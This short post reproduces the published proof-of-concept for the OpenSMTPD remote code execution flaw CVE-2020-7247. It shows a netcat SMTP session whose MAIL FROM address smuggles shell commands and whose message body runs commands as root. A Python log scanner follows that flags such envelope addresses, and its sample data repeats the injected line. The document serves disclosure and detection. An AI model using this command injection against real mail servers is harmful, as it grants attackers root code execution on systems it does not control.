I came across a rather unexpected OpenSMTPD RCE in "OpenBSD OpenSMTPD Remote Code Execution Vulnerability (CVE-2020-7247)", and the example in "Qualys Security Advisory LPE and RCE in OpenSMTPD (CVE-2020-7247)" shows that the exploit is simple and easy to follow:
$ nc 192.168.56.143 25
220 obsd66.example.org ESMTP OpenSMTPD
HELO professor.falken
250 obsd66.example.org Hello professor.falken [192.168.56.1], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
RCPT TO:<root@example.org>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
for i in W O P R; do
        echo -n "($i) " && id || break
done >> /root/x."`id -u`"."$$"
.
250 2.0.0 4cdd24df Message accepted for delivery
QUIT
221 2.0.0 Bye
That's rather amusing...
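The session above places shell commands in the MAIL FROM address, which is something a defender can look for in SMTP transcripts or proxy logs. The following is an added example, not code from the original post or from the Qualys advisory; the function names and the conservative character allow-list (stricter than RFC 5321) are assumptions of this example.

```python
import re

# Matches the two SMTP envelope commands and captures the path inside <...>.
ENVELOPE = re.compile(r"^(MAIL FROM|RCPT TO):\s*<(.*)>", re.IGNORECASE)
# Assumed policy for this example: a conservative allow-list, stricter than RFC 5321.
LOCAL_ALLOWED = re.compile(r"[A-Za-z0-9._+=-]")
DOMAIN_OK = re.compile(r"^[A-Za-z0-9.-]+$")

def check_envelope(line):
    """Return (command, reasons) for an envelope command line, or None otherwise."""
    m = ENVELOPE.match(line.strip())
    if not m:
        return None
    cmd, addr = m.group(1).upper(), m.group(2)
    if addr == "":  # null reverse-path <> is valid on MAIL FROM (bounces) only
        return cmd, ([] if cmd == "MAIL FROM" else ["empty address"])
    local, sep, domain = addr.rpartition("@")
    reasons = []
    if not sep:
        local = addr  # rpartition puts the whole string last when "@" is absent
        reasons.append("no domain part")
    elif not DOMAIN_OK.match(domain):
        reasons.append("invalid domain")
    bad = sorted(set(LOCAL_ALLOWED.sub("", local)))
    if bad or not local:
        reasons.append("local part outside allow-list: %r" % "".join(bad))
    return cmd, reasons

def scan(client_lines):
    """Return (line number, command, reasons) findings, skipping the DATA body."""
    findings, in_data = [], False
    for n, line in enumerate(client_lines, 1):
        if in_data:
            in_data = line.strip() != "."
        elif line.strip().upper() == "DATA":
            in_data = True
        else:
            result = check_envelope(line)
            if result and result[1]:
                findings.append((n, result[0], result[1]))
    return findings

# Constructed sample: client-side lines modelled on the session above, then a benign one.
SAMPLE = [
    "HELO professor.falken",
    "MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>",
    "RCPT TO:<root@example.org>", "DATA", "MAIL FROM:<;ignored inside body;>", ".",
    "MAIL FROM:<alice@example.org>"]
if __name__ == "__main__":
    print(scan(SAMPLE))
```

A check like this helps with log review and alerting only; it does not replace updating OpenSMTPD.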